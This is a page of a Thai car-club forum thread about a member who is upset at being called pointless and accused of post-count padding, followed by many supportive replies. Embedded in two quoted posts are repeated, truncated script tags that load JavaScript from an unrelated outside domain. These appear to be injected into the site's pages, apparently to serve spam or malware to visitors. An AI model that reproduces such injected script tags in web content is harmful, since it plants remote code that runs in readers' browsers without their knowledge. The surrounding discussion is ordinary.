หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
Khao_Kee

เข้าร่วม: 03 ตุลา 2008
ตอบ: 264

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 323
ให้คำขอบคุณ: 544

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 15 มิถุนา 2013 06:46 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
คนร้อยคน
มองคุณไม่เหมือนกันหรอก
เพราะฉะนั้นอย่าไปคิดมาก ถ้ามีคนตัดสินคุณ
ด้วยความที่เขาไม่รู้จักคุณดีพอ
ได้รับคำขอบคุณจาก: plevampire 
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 15 มิถุนา 2013 07:05 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
สู้ๆครับคุณเปิ้ล..
Ryuknight

เข้าร่วม: 31 พฤษภาคม 2009
ตอบ: 2750

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3285
ให้คำขอบคุณ: 1525

เสาร์, 15 มิถุนา 2013 07:10 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
เอาพริตตี้ ประจำเวบเค้า คืนมานะ
นานๆจะมี สาวสวย มาอยู่บ้าง

บางคนยังไม่กล้าเผยตัวตนเท่าคุณเปิ้ลเลยครับ

คิดว่าเหมือนเรื่องที่ทำงานอ่ะ
มีคนชอบบ้าง ไม่ชอบบ้าง ทั้งที่เราก็ไม่ได้ไปทำให้เขาเดือดร้อน

"อันนินทากาเลเหมือนเทน้ำ ไม่ชอกช้ำเหมือนเอามีดมากรีดหิน
แม้องค์พระปฏิมายังราคิน โลกนี้หรือจะสิ้นคนนินทา "
ได้รับคำขอบคุณจาก: plevampire  DELL  Nine_Eleven  Oil_liO  chokpiti 
Pantamitr

ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 15 มิถุนา 2013 07:10 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
 หลากคน หลายความคิด หลายอารมณ์ ธรรมดาในโลกนี้ครับ
kobkobok

ชื่อเล่น: กบ

เข้าร่วม: 09 กุมภา 2010
ตอบ: 3919

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1738
ให้คำขอบคุณ: 290

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อย่าไปคิดมาก ไม่เห็นคุณเปิ้ลจะทำไม่ดีตรงไหนเลย
Cool_M

ชื่อเล่น: แม็ก

เข้าร่วม: 18 ธันวา 2012
ตอบ: 1928

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2509
ให้คำขอบคุณ: 2304

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 15 มิถุนา 2013 07:21 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
สู้ๆค๊าบบ
หาดเจ้า

ชื่อเล่น: เจ

เข้าร่วม: 05 พฤศจิกา 2012
ตอบ: 815

Guru ES
Guru ES

ได้รับคำขอบคุณ: 854
ให้คำขอบคุณ: 1065

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 15 มิถุนา 2013 07:51 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
ใจเขาใจเราครับ
เราคิดว่าเราทำดี คิดดี  ไม่สร้างความเดือดร้อนให้ใคร พอครับ
คนชอบมีเยอะ คนไม่ชอบก็เยอะ 
อย่างใส่ใจ

Armdevil

ชื่อเล่น: อาร์ม นคร

เข้าร่วม: 19 เมษา 2012
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 567

สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 15 มิถุนา 2013 08:03 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
ผมคนหนึ่งที่ไม่เกลียลเปิ้ลคับ เปนกำลังจัยให้คับ สู้ๆๆ
ยังงัยก็เปนครอบครัว Es เหมือนกานคับไม่รู้จะเกลียดกานทำไม

plevampire

ชื่อเล่น: เปิ้ล

เข้าร่วม: 19 กุมภา 2013
ตอบ: 2066

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2640
ให้คำขอบคุณ: 2889

ปี: 2005
เสาร์, 15 มิถุนา 2013 08:07 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
eschocolate พิมพ์ว่า:
ซะงั้น เป็นไรอะพี่เปิ้ล?

พี่รู้สึกเสียใจนิดหน่อยอ่ะ พี่โพสต์กระทู้ว่า "สงสัยค่ะกูรู"
พี่ไม่รู้ว่ากระทู้ที่พี่โพสตไปมันหายไปไหน ใครรู้ช่วยบอกที พี่ไม่ได้ซีเรียสอะไรเลย ชิวๆๆก็แค่ตั้งถามเล่นๆๆ

น้องลองไปอ่านดู แหมเข้ามากะจะว่ากันชัดๆ เขาไม่ตอบพี่ก็ไม่ได้ว่าอะไร แต่เล่นตอบมาไม่ตรงกับที่พี่สงสัย ไอ้คนที่มาซำ้ก็บอกอีกว่า
"ก็อย่าไร้สาระให้มันมากสิ่ จะรีบทำยอดไปไหน!"

พี่ไม่ได้ให้ใครมาสอนนะ ไม่ต้องตอบก็ได้
ตอนนี้ก็ยังร้องไห้ยุ" คิดว่าพี่น้องesพูดได้แบบนี้เลยเหรอ เค้าเปนผู้ชายนะ พี่เปนผู้หญิง พี่ก็มีความรู้สึกเปนนะ $_$
จ่าทัน

เข้าร่วม: 26 พฤศจิกา 2012
ตอบ: 608

Guru ES
Guru ES

ได้รับคำขอบคุณ: 391
ให้คำขอบคุณ: 330

เสาร์, 15 มิถุนา 2013 08:20 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
"คนรักเท่าผืนฟ้า คนชังเท่าผืนเสื่อ" แปลสำนวนนี้ก็หมายถึงว่า คนที่จะรักเราจริง ๆ มีมาก แต่คนเกลียดหรือคนชังเรามีเป็นส่วนน้อยน่ะ    สู้ๆๆ น่ะน้องเปิ้ล
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ปี: 2003
เสาร์, 15 มิถุนา 2013 08:30 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
จ่าทัน ครับ แต่ผมว่า คนเกลียดผมเท่าผืนฟ้า คนรักผมเท่าผืนผ้าเช็ดหน้า ทำงัยดีครับ 5555555+
ได้รับคำขอบคุณจาก: Oil_liO 
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

เสาร์, 15 มิถุนา 2013 08:35 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
อย่าไปเครียดครับ คุณเปิ้ล  ..............     

ผมว่าคุณเปิ้ลทำให้บอร์ดของเรามีสีสัน ขึ้นนะครับ  ...........   

สู้ๆครับ  .................
จ่าทัน

Guru ES
Guru ES

เสาร์, 15 มิถุนา 2013 08:36 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
LifeFate พิมพ์ว่า:
จ่าทัน ครับ แต่ผมว่า คนเกลียดผมเท่าผืนฟ้า คนรักผมเท่าผืนผ้าเช็ดหน้า ทำงัยดีครับ 5555555+

ก้อเอาผ้าเช็ดหน้าหลายๆ ผืนมาต่อกันเดี๋ยวก้อใหญ่เท่าฟ้าเองล่ะครับ 

sukhothai

เข้าร่วม: 23 สิงหา 2009
ตอบ: 1604

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2571
ให้คำขอบคุณ: 7453
เสาร์, 15 มิถุนา 2013 08:39 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
ตามมาขอโทษครับ

ไม่มีเจตนาจะว่าคุณเปิ้ลเสียใจจริงๆนะครับ ขอโทษด้วยความจริงใจครับ

ส่วนท่านอื่นที่คิดจะด่าต่อก็เชิญครับ เพราะผมไม่ได้เกลียดคุณเปิ้ลครับ

ถ้าย้อนกลับไปดูกระทู้ของน้องเขาผมตอบแซวๆเกือบทุกกระทู้

และวันที่ไปเตะบอลกันที่ชลบุรีก็เห็นหน้าคาดตากันมาแล้ว ไม่มีเหตุผล

ใดที่ผมจะเกลียดครับ น้อมรับทุกความคิดเห็นครับ จะติหรือชม

แต่อย่าด่านะครับ
ได้รับคำขอบคุณจาก: plevampire  kim_possible  Nine_Eleven  tokykung  Nung_Sodapop  tokmun002  Goo_golf  LnwwasaD  Oil_liO  ahingrace  converse 
koobe

ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 15 มิถุนา 2013 08:47 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
ใจเย็นๆ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 17 มิถุนา 2013 12:07, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: plevampire  AofStaR 
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:03 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
civic_ubon พิมพ์ว่า:
ใครกันหนอช่างพูดไม่คิด ครอบครัว Es มีแต่แบ่งปันน้ำใจ ช่วยเหลือซึ่งกันและกันสนุกสนานคลายเครียดขำๆ ยังมีคนที่คิดไม่ดีอีกหรอ

อึ่มนะ^_^ เปิ้ลก็นอยมาก เปิ้ลไม่เคยคิดไม่ดีอะไรเลย มาบอดก็สนุกๆสนานโพสตอะไรบ้าง มันก็คือกระทู้ของเปิ้ลเอง กระทู้เปิ้ลไม่ค่อยมีสาระ ขอแค่แสดงว่าเรายังไม่หนีไปไหนยุในครอบครัวesทุกวัน

แต่ก็เถอะนะ
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:04 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
คนรักก็มี คนเกลียดก็มี เหมือนกันทุกคนคร้าบ

คร้าบบบ เปิ้ลมองโลกในแง่ดีเสมอค่ะ
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:04 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
song พิมพ์ว่า:
ไม่เอาน่ะอย่าคิดมาก

คิดมากคิดไปแล้ว ล้างตาไปหลายรอบแล้วค่ะ$_$
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:05 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
tamy2975 พิมพ์ว่า:
อนิจจัง ทุกขัง อนัตตา

โฮ๋พี่น้องระยองมาแบบทางธรรมเลยอ่ะ-_-#
จ่าทัน

Guru ES
Guru ES

เสาร์, 15 มิถุนา 2013 09:08 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
โอเค ยังครับน้องเปิ้ลขอให้กลับมาสดใสเหมือนเดิมน่ะครับ
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:09 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
toshi พิมพ์ว่า:
ไม่รู้ต้นสายปลายเหตุ ว่าเกิดอะไรขึ้น แต่อยากจะบอกตามข้างบนเลย คนรักก็มี คนเกลียดก็มี สู้ ๆๆ คาบ

Snook พิมพ์ว่า:

thammarong007 พิมพ์ว่า:
ไม่ต้องคิดมากนะครับ คิดดี ทำดี ก็พอแล้ว เรารู้ตัวเราเองดีครับ เป็นกำลังใจให้ทุกๆคนที่ คิดดี ทำดี นะครับ

เสก พิมพ์ว่า:
เขาคิดอะไรมันก็เรื่องของเขา เราคิดดี ทำดี พอแล้ว สู้ๆครับ

เสก พิมพ์ว่า:
อ่อลืม positive think อันนี้ใช้กับทุกคนได้ โลกเรามีความสุขแน่ อิอิ

alivez พิมพ์ว่า:
ต่างคนก็มองต่างมุม อย่าคิดมากเลยครับ ถ้าเราคิดว่าเราไม่ได้ทำไม่ดีก็อย่าไปคิดมากเลยครับ ทุกสังคมมีคนที่ชอบกับคนที่ไม่ชอบในตัวเราอย่างที่พี่ๆบอกอ่าครับ

Ton- พิมพ์ว่า:
เดินทางสายกลางสิครับ อะไรที่มากไปถ้าเรารู้ตัวก็ลดลงมาบ้าง อะไรขาดไปก็เติมเข้าไปหน่อย เอาแค่พอดีๆ ปัญหาก็จะน้อยลง

แทนที่จะน้อยใจ ลองเปลี่ยนแปลงดูจะดีกว่า ได้ก้ได้ แต่ถ้าไม่ได้ก็ปล่อยไป

ขอบคุณมากๆค่ะกับกำลังใจที่มีให้ค่ะ ซึ้งจนร้องไห้รอบสอง

มองโลกในแง่ดี ไม่เคยอคติกับใคร เฮฮาแบบพี่น้อง ไม่ได้มาเพื่อทำร้ายใครหรือมาเพื่อลองใจใคร!

ยอมรับว่ากระทู้เปิ้ลเองค่ะที่อาจไร้สาระบ้าง ที่es ของเรายุในใจเสมอ
ได้รับคำขอบคุณจาก: Pantamitr 
inntuch

เข้าร่วม: 15 สิงหา 2012
ตอบ: 535

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 151
ให้คำขอบคุณ: 1
เสาร์, 15 มิถุนา 2013 09:11 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
เอาน้าอย่าไปคิดมากครับ
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:11 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
JEEP99 พิมพ์ว่า:
เรื่องไม่เป็นเรื่อง

s พิมพ์ว่า:
ไม่ เคยสงสัย เพราะไม่เคยสนใจ แต้งหายกระทู้หายหรืออะไรที่หลายๆท่านตั้งกระทู้ถามมาหลายๆท่านก่อนหน้านี้ แค่เราเข้าใจรู้ว่าตัวเองเข้ามาในเว็ปนี้เพื่ออะไร แค่นั้นก็พอ มาหาความรู้ มาหาเพื่อนมาหาแต้ง มาหาตัวเขียว มาหาผลประโยชน์ หรือมาหาอะไร ตัวเรารู้ตัวเองดีครับ ความคิดเห็นส่วนตัวนะครับ

P พิมพ์ว่า

ไม่สงสัยไม่ต้องตอบก็ได้ไม่ได้ว่าอะไรนิ่

แค่ถามคนที่รู้ มีไรสงสัยก็ถามไป ไม่ตอบหรือไม่รู้ ก็ไม่ต้องพูดกระแนะกระแน๋ก็ได้ เรามันไร้สาระอ่ะ อย้าเข้ามาตอบกวนๆแบบนี้เลยเปลืองพื้นที ไม่อยากฟังหรอกความคิดใครคิดมัน

t พิมพ์ว่า
ก็อย่าไร้สาระมากเกินซิครับ ไม่ต้องเร่งทำยอดหรอกครับ

P พิมพ์ว่า
หนักหัวใคร
ของขึ้น เร่งแล้วมันผิดหรอ อยากรู้จัง กฎเค้ามีห้ามทำยอดด้วยหรอ

สรุปน้อยใจ ...............................................

ช่ายๆๆสรุปน้อยใจมาก!แค่เรื่องไม่เปนเรื่องนิ่ล่ะค่ะ คนนะมีจิตใจ ผญ.เราย่อมมีความอ่อนไหวเสมอ พูดอะไรนึกถึงใจกันบ้าง ใจเขาใจเรา ทั้งๆที่เราก็ไม่เคยทำร้ายจิตใจใคร!
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:18 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
akkarin_c พิมพ์ว่า:
เป็นเรืีองปกติที่มีกระทบกระทั่งกันบ้าง
บางคนอาจจะไม่ชอบกระทู้แบบขำๆ ก็ไม่ต้องเข้าไปอ่านก็จบครับ
ส่วนตัวผมก็ชอบอ่านพวกกระทู้ปัญหา หาข้อมูล(มาซ่อมรถตัวเอง)
อันไหนอยากอ่านก็อ่าน ไม่อยากอ่านก็ไม่อ่านครับ
สมาชิกก็มีใหม่มา เก่าไป ลักษณะเนื้อหาของกระทู้ก็ย่อมเปลี่ยนไปตามอายุรถ ข้อมูลปัญหารถหรือของแต่งก็หาได้จากกระทู้เก่าๆ
เลยทำให้กระทู้เกี่ยวกับปัญหา ของแ
ต่งอาจจะน้อยลงไปไม่เหมือนสมัยก่อน
ก็พอเข้าใจความรู้สึกคนที่ไม่ชอบนะ แต่เฉยๆไว้น่าจะเป็นการดีกว่าครับ อย่างน้อยก็คนในคลับเดียวกัน ขับ es เหมือนกัน
รถเท่ๆ อย่าง es กับผู้หญิง มันเป็นของคู่กันอยู่แล้ว
อีกอย่างก็ถือว่าว่าเป็นสีสันครับ ทั้งบอร์ดมีแต่ผู้ชาย แห้งเหี่ยวแย่เลย

อึ่มๆรับฟัง เปิ้ลเปน ผญ. จะมาเม้าเรื่องรถแบบเชี่ยวชาญได้ไง นิ่มันหัวข้อ เรื่องอื่นๆนะค๊ ใครจะอ่านเรื่องรถก็เชิญไปหัวข้อนั้น แต่เปิ้ลไม่ได้โพสต์เรื่องรถ แค่ตั้งกระทู้ เพราะแค่สงสัย ไม่รู้!แค่นี้มันผิดเหรอค๊

เปิ้ลเข้ามาบอดก็เพราะมีes แล้วก็ใช้ยุ มาเพื่อศึกษา เก็บข้อมูลบ้างไรบ้างอาจจะมองว่าเปิ้ลทำไมไม่พูดเรื่องรถ !!แล้วก็มีคำถามขึ้นมา เข้าบอดเพื่ออะไร?

รถเปิ้ลไม่แต่งอะไรมาก ปัญหาก็ไม่มี แล้วจะให้เปิ้ลตั้งกระทู้อะไร ? ที่โพสต์ก็แค่แสดงถึงความเคลื่อนไหวยุกับบอดesทุกวัน
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:20 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
EgawiT7864 พิมพ์ว่า:
มีสาระบ้าง ไร้สาระบ้าง มันก็เป็นเรื่องธรรมดา เนาะ  อิอิอิ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ค่ะ เปิ้ลอยากใข้ชีวิตปัจจุบันให้มีความสุขเยอะๆบนesเรา ไม่ได้เรียกร้องอะไร สนุก เฮฮา มีสาระบ้างไม่มีสาระบ้างก็มันเปนกระทู้ของเราเอง แต่ไมมีคนเดือนร้อนจังก็ไม่รู้!
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:21 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
kujokung พิมพ์ว่า:
คนจริง...ไม่แคร์สื่อ...555
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ถามจริง?

แล้วคิดว่า สื่อมันยุในครอบครัวes แล้วเราจะแคร์ไหม?
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:22 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
tochi229 พิมพ์ว่า:
เอาใจเขามาใส่ใจเรา แค่นี้ก็อยู่ด้วยกันอย่างมีความสุขแล้ว

ค่ะพี่^_^

เปิ้ลคิดเสมอเอาใจเขาใส่ใจเรา แล้วที่เค้าพูดไปเขาไม่เหนใส่ใจเราเลย
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:26 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
Arthur4344 พิมพ์ว่า:
เปิ้ล อย่างคิดมากคนเรานานาจิตตัง มีคนรักก็ย่อมมีคนเกลียด มันเป็นธรรมดาของปุถุชน
พี่ว่าตั้งแต่เราเข้ามามันเพิ่มสีสรรในคลับมาก สนุกสนาน เฮฮา แม้ว่าเราไม่เคยเจอกัน
แต่ก้อรู้สึกได้ถึงความอยากเป็นส่วนหนึ่งครอบครัวES จนคนอื่นรู้สึกว่าเด่นไปป่าว สร้างกระแสป่าว
สู้ๆ น้อง พี่เป็นกำลังใจให้ พี่ว่ามีคนเป็นแฟนคลับเราไม่น้อยเลยทีเดียว อย่าไปฟังเสียงนก เสียงกา
เป็นเรื่องปกติที่เค้าว่า คนรักเท่าผืนหนัง คนชังเท่าผืนเสื่อ สู้ สู้ ไอ้น้อง

ขอบคุณค่ะพี่^_^ที่คอยให้กำลังใจ เค้าอาจจะมองว่าเปิ้ลสร้างกระแสบ้างไรบ้างต่างๆนาๆ

แล้วการสร้างกระแสทำให้เปิ้ลเปิ้ลได้โล่ห์เปิ้ลก็จะสร้าง แต่นิ่มาด้วยความจริงใจรักจริงๆes ไม่หวังอะไร แค่อยากเปนมิตรกับทุกๆคน

กระทู้เปิ้ลยอมรับว่ามันไร้สาระเรื่องไม่เปนเรื่อง มันก็คือกระทู้เปิ้ล แต่ทำไมมีคนเดือนร้อน ร้อนตัวจัง

รู้ซึ้งถึงจิตใจคน
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:29 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
Goo_golf พิมพ์ว่า:
คนที่บอกว่า อย่าไร้สาระมาก อย่าเร่งทำยอดเนี่ย เขาคงยังไม่รู้จักคำว่าครอบครัว คำว่าพี่น้องของพวกเราหรอกคับ มันน่านัก

อึ่มๆๆค่ะ ถ้าไร้สาระเปิ้ลคงไม่ไปมิตติ้งใหญ่ถึงสองครั้งหรอกค่ะ

เปิ้ลไร้สาระยังไงมันก็คือเปิ้ลเองไม่ได้กล่าวถึงใคร

ร้อนตัวกันมากค่ะ รักesยุกับบอดesทุกๆวัน
ได้รับคำขอบคุณจาก: Goo_golf  Oil_liO 
plevampire

ครอบครัว ES
ครอบครัว ES

เสาร์, 15 มิถุนา 2013 09:32 - อย่าจองเวรจองกรรมกันอีกเลย เจ้าของกระทู้มันตายไปละ ขอบคุณคนที่คอยให้กำลังใจ
domziia พิมพ์ว่า:
คุณเปิ้ลเค้าโพสกระทู้มาให้มีสีสันในบอร์ดผมว่าดีออกนะคับ อย่าไปคิดว่าจะมาทำยอดอะไรเลยคับ ต่อให้มีเป็นหมื่นเป็นแสน thank ก็ไม่สำคัญเท่ากับเค้าตั้งใจทำให้เว็บแห่งนี้ต่างหาก

ใช่ค่ะ ขอบคุณนะค๊สำหรับคำปลอบใจ

เปิ้ลไม่ได้หวังโล่ห์หรอกค่ะ เพราะมันไม่มีโล่ห์ให้ ที่เข้ามาก็โพสตไรเฮฮาบ้างไรบ้าง สงสัยบ้างไรบ้าง เพื่อจะได้เปนแนวทาง

ส่วนทำยอด มันก็เหมือนการเล่นเกม เล่นเกมเรายังอยากให้แต้มมันเยอะๆเรย
หัวข้อนี้ถูกล็อก คุณไม่สามารถแก้ไข หรือตอบได้
หน้า 2 จาก 5
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.